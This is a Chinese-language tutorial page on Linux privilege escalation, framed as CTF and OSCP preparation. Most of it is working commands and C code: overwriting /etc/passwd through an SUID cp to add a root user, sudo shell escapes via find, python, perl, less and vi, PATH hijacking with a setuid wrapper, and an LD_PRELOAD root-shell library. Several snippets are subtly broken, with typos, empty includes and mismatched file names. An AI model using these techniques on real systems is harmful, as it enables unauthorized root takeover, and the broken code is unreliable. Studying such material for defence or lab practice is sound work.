linux 提权

目录

linux提权

命令提权

前提条件是具有 s 权限

cp 提权

创建用户提权

编辑 /etc/passwd 里面

0查看文件是否具有 s 权限

赋予s权限 chmod o+s /usr/bin/cp

ls -al

-rwsr-xr-x 1 root root 156316 Feb 28 2019 /usr/bin/cp

1.查找具有s权限的系统命令

find / -perm -u=s -type f 2>/dev/null

筛选具有s权限的cp命令 find / -perm -u=s -type f 2>/dev/null | grep cp

2生成密码字符串，

openssl passwd -1 -salt hcak 123456

用户名 密码

3编辑复制下来的passwd文件

手动编写一个用户 将 生成的密码字符添加

hack:秘密字符(注意最后有个 . ).:0:0:,,,:/home/hcak:/bin/bash

4把修改后的passwd文件上传到目标 然后使用cp pssswd /etc/passwd 将目标原有的passwd覆盖掉

5切换到添加的具有root权限的用户

su - hack 然后输入密码

sudo 提权

查看 用户是否巨厚权限 /etc/sudoers文件

查看当前用户可以使用的系统命令

sudo -l

显示 (root) NOPASSWD:/uer/bin/find,/usr/bin/python

如果具有 find

提权 sudo find /home -exec /bin/bash \;

如果具有python

提权 sudo python -c 'import pty;pty.spawn("/bin/bash")'

perl

提权 sudo perl -e 'exec "/bin/bash";'

less

提权 sudo less /etc/hosts

然后在最后一行输入 ！bash 然后回车

类似 man,vi命令 sudo man man , sudo vi ,之后输入!bash 反弹root权限shell

find 提权

find / -perm -u=s -tyep f 2>/dev/null

touch abc

find abc -exec "whoami" \;

PATH变量提权

cd /bin/rootshell

创建一个c文件 将下面的c代码放入

#include

#include

#include

int main(){

setuid(geteuid)());

system("ps");

return 0;

}

sudo gcc test.c -o shell

sudo chmod u+s shell

cd /tmp

echo "/bin/bash" > ps

chmod 777 ps

echo $PATH

export PATH=/tmp:$PATH

cd - 返回到上一次打开的目录

./shell 获取到root权限

其他的 例如 ps,cat,....都可以使用这个方法提权前提是/tmp 目录下的文件具有777权限

LD_Ppreload 变量提权

LD_Ppreload 是对资源共享库进行加载的环境变量

ctf比赛和oscp考试中经常遇到这样的提权

env_keep+=LD_PRELOAD

find

sudo -l

1. /tmp

touch shell.c

#include

#include

#include

void _init(){

unsetenv("LD_PRELOAD"));

setgid(0);

setuid(0);

system("/bin/sh");

}

2 编译为共享库 .so文件

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

ls -al shell.so

3 sudo LD_PRELOAD=/tmp/shell.o find

kali linux 下的定时任务设定

crontab -e 编辑当前用户的定时任务 本质编辑文件 /var/spool/cron/crontabs 下的文件

分 时 日 月 命令

*/1 * * * * echo i am runing >> test.txt//每分钟执行一次

命令创建后会在指定的时间自动执行

/var/spool/cron

（编辑：站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!